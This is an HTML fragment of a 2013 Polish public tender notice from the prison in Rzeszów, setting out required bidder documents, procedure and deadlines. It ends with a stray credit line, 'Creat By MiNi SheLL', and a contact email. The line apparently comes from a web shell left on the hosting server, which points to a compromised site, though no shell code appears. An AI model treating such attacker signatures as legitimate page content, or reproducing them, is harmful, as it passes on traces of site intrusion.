<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- kosztorys informacyjny zawierający co najmniej pozycje z przedmiaru robót będącego elementem dokumentacji przetargowej. 
 - w przypadku składania oferty powołującej się na  rozwiązania równoważne w zakresie urządzeń, materiałów, rozwiązań projektowych i innych,  w celu  potwierdzenia że dane elementy  odpowiadają określonym wymaganiom w dokumentacji projektowej należy przedłożyć karty katalogowe i/lub aprobaty techniczne i/lub atesty i/lub inne z których jednoznacznie wynika że oferowane elementy spełniają wymagane parametry.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli dokumenty podpisuje upoważniony przedstawiciel Wykonawcy należy  przedłożyć do dokumentacji o zamówienie publiczne stosowne pełnomocnictwo potwierdzające uprawnienia danej osoby do podejmowania czynności w imieniu Wykonawcy. Kopia pełnomocnictwa powinna zostać poświadczona za zgodność z oryginałem przez Wykonawcę lub osobę  uprawnioną  do podejmowania czynności w imieniu Wykonawcy.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zgodnie z art. 26 ust. 2b ustawy Pzp. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Treść powyższego dokumentu (lub dokumentów) powinna bezspornie i jednoznacznie wskazać na zakres zobowiązania podmiotu trzeciego, określać czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonane, w tym jakiego okresu dotyczy (wymagana forma dokumentu - oryginał).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany postanowień zawartej umowy oraz warunki zmian określone zostały  w projekcie umowy stanowiącym załącznik nr 10 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Rzeszowie, 35-322 Rzeszów, ul. Załęska 76..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2013 godzina 11:00, miejsce: Otwarcie  ofert  nastąpi  w dniu składania ofert o godz. 11:15  w  siedzibie Zamawiającego tj. w sali odpraw Zakładu Karnego w Rzeszowie, 35 - 322 Rzeszów, ul. Załęska 76..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com